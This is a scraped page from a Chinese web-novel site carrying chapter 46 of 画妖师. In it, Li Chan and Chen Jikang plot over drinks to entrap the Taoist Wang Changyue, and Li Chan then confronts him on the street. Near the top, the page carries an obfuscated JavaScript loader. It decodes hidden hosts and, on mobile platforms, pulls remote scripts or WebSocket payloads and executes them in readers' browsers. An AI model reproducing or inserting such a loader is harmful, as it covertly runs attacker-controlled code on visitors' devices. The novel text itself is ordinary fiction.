笔趣阁

字:
关灯 护眼
笔趣阁 > 画妖师 > 四十六:执柯
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

四十六:执柯

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
辰正,距清微观的晨钟,才过去了一个多时辰。观中道士的早课还未结束,纵隔着一街风雪,似乎也能听到超然物外的读经声。西市东边浮桥街畔的刘记脚店里,店伙计正把切得十分规整的冰砖搬进窖中,用棉布压实,为来年春夏的冰饮做准备。一名伙计则出了后厨,把一碟梅子姜端到靠窗的桌上。
  
  
  
  桌上已有了几样酒菜,边上坐了两个客人,一个是李蝉,另一个是神咤司监印陈季康。
  
  
  
  待伙计走后,陈季康低声说:“那道士就在观中,清微观早课过后,他便会出来。这道士行事有些古怪,喜欢做功德,还不收钱。”
  
  
  
  李蝉道:“难不成是个真善人?”
  
  
  
  陈季康摇头,“这也算不上,这人做功德,做得有些着魔了,迥异于其他玄门羽士。说来,他入京后,在崇玄署录了名,报上了来年的乾元学宫春试。这王常月师从绛宁隐楼观,隐楼观不大,玄门虽有门户之见,却只在同等的门户之间作比,从小观拜入大观,不是稀奇事,看来,那王常月来玉京,是想进乾元学宫了。不过,看他行事古怪,视功德如命,希夷山又对外宣扬,你勾结妖魔,颠覆玄都。说不准,这人也把你视作一桩功德了。”
  
  
  
  李蝉眉毛一挑,看了看自己的手,笑道:“那我可真是桩大功德。”
  
  
  
  陈季康也笑了笑,问道:“他若真是为玄都之事来的,李游奕打算怎么应对?”
  
  
  
  李蝉沉吟,夹一片梅子姜,咬下一丝,在舌尖品咂着,隔窗打量对街的清微观。
  
  
  
  陈季康又说:“这人是个有谱牒的道士,两教中人地位超然,当初那洪宜玄,勾结域外妖魔,不过是希夷山的一枚弃子,他在玄都横死,也闹出了不小的动静。”
  
  
  
  李蝉收回目光,“陈监印以为,怎么做最妥当?”
  
  
  
  陈季康道:“两教中人,轻易杀不得,也伤不得。不过,玉京毕竟是朝廷的地盘。这人行事如此古怪,也正是他的弱点。派几个人,冒充假道士,在离清微观远些的地方,演一出戏。此人见妖道行骗,定会出面揭穿。若那妖道猖狂挑衅,引他出手,他便是当街伤人了。”
  
  
  
  陈季康寥寥数语,意思却很明白,那看客和“妖道”,都是一伙的,自然也就没有什么妖道行骗,只有道士当街伤人了。至于伤得多重,都可以在事先安排。
  
  
  
  陈季康又说:“这事可大可小,但奉上乾元学宫春试,那道士当街伤人的名声传出去,便对他十分不利。但官差已至,他寄寓清微观,名姓都留下来了,没法一走了之。”
  
  
  
  李蝉啧声道:“不愧是神咤司,那道士纵有一身神通,在这境况下,也没法施展。不过,他被人诬蔑,也知道有人给他下套了。”
  
  
  
  “就是让他知道。”陈季康呵呵一笑,“可咱们的官差,唱的却是红脸。”
  
  
  
  “怎么个唱法?”李蝉问。
  
  
  
  陈季康肃容,换了副口气,“这位道长,某在玉京巡查执法已久,却有几分识人的眼力,看道长不似歹人。”又压低声音,“不过,这伙人胆子不小,恐怕有些来历,这人越聚越多,到时候,事情传出去,不论结果如何,都对道长不利。道长若回了清微观,唉,也要被人戳脊梁骨。且随某走一趟,到官衙中暂避。到时候,定还道长一个清白。”
  
  
  
  说罢,清了清嗓子,说道:“修行者地位超然,若要拘捕审问,需要崇玄署、刑部、大理寺、诸元台三司文书,缺一不可。咱们也只能先把他骗到神咤司中,到时候,再试探他的底细,也就方便多了。”
  
  
  
  李蝉喝了杯酒,手指摩挲着薄薄的杯沿,心想,若那黑脸红脸演得够好,便连自己也要着了道。不过这计策虽然周密,利用那道士的行善之举,却未免有些不择手段。
  
  
  
  陈季康接着说:“届时,他若不知道李游奕的身份最好,若知道的话,麻烦就大了。他既然知道了你的身份,希夷山必然也已经知道了,届时,纵然顾忌神咤司,不敢明着伤你性命,暗中却决不会罢休。李游奕最好隐姓埋名,再换个身份,只不过这样的话,如今冬天已过去一半,李游奕刚在玉京有了些名声,再捏造一重身份,你的春试,便要受些影响。但若不改头换面,希夷山也会施压。”说到这里,他叹了口气,“这话说着有些窝囊,但希夷山不光是道门圣地,又总领天下神道,便连圣人在它面前,也要矮上一头。”
  
  
  
  陈季康的话不假,自古人皇要昭示正统,总要标榜一句“受命于天”,这天,儒家虽解释为天道,在生民眼里,其实就是天上的神仙。圣人祭祀社稷,祈祷风调雨顺,那行云布雨的,可不就是八方神灵?
  
  
  
  “好事要做坏的打算,坏事么,再把打算做得太坏,便伤士气了。”李蝉却舒展了眉头,“陈监印也不必大费周章了,我当面去会会他吧。”
  
  
  
  陈季康一愣,“李游奕这是……”
  
  
  
  “他八成想不到我会这么做。”李蝉笑了笑,“人没防备时,脸上就藏不住东西了。”
  
  
  
  ……
  
  
  
  清微观西,刺柏凌霜,窗里,王常月没去经堂的早课,只是在桌边吃豆子。
  
  
  
  他手边放着一个竹箕,箕中炒熟的豆子香气扑鼻,有黄黑二色。
  
  
  
  这豆子的吃法,颇有讲究,还是隐楼观的赵中岁教他清心的法子。
  
  
  
  这法子说来也容易,每兴一善念,就吃一颗黑豆,每兴一恶念,吃一颗黄豆。做起来却不容易,寻常人要捋清念头,就得费好大一番功夫,要吃得盘中只剩黄豆,更是难上加难。他每天把炒豆子当早饭,向来吃得箕中只剩几粒黑豆,今天,吃到快饱了,箕中却是黄黑参半。原因也简单,桌边放着面正衣冠的八卦镜,往常,他从不照镜子,毕竟看了也是白看,今早,却忍不住看了那镜子好多回。
  
  
  
  待吃豆子吃得口干,王常月叹了口气,把那八卦镜盖到桌上,把功过格揣进袖中,带上葫芦和剑,打算出门做些功德。
  
  
  
  与照面的几个道士见礼过后,赞扬了同道一番,道了几声功德无量,记下几笔微薄功德,他总算心头畅快了些。
  
  
  
  他离开清微观,浮桥街上有车马经过,青砖路牙边上,有行人几许,其中有个青年戴着风兜,静立雪中。
  
  
  
  王常月目光一扫,与青年对视一眼,不以为意,从青年身边经过。刚走过两步,侧后方却传来一道声音:“昆阳子?”
  
  
  
  王常月顿足回头,说话的正是那名青年,他怔了一下,面色疑惑,“正是贫道,你……”
  
  
  
  青年道:“你不认得我?”
  
  
  
  王常月仔细打量青年几眼,却对这张脸没有丝毫印象,奇道:“我为什么要认得你?”
  
  
  
  李蝉也在打量王常月,这道士的反应,的确是不认识他,他心中一松,“你却打听过我。”
  
  
  
  王常月试探道:“足下是?”
  
  
  
  “李澹。”
  
  
  
  青年吐出这两个字,王常月高高挑起眉毛,既惊讶,又有些茫然,“你就是李澹?”愣了一会,又问:“你知道我在清微观?你怎么认得我?”问时,便想起昨天夺镜而逃的狐女。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师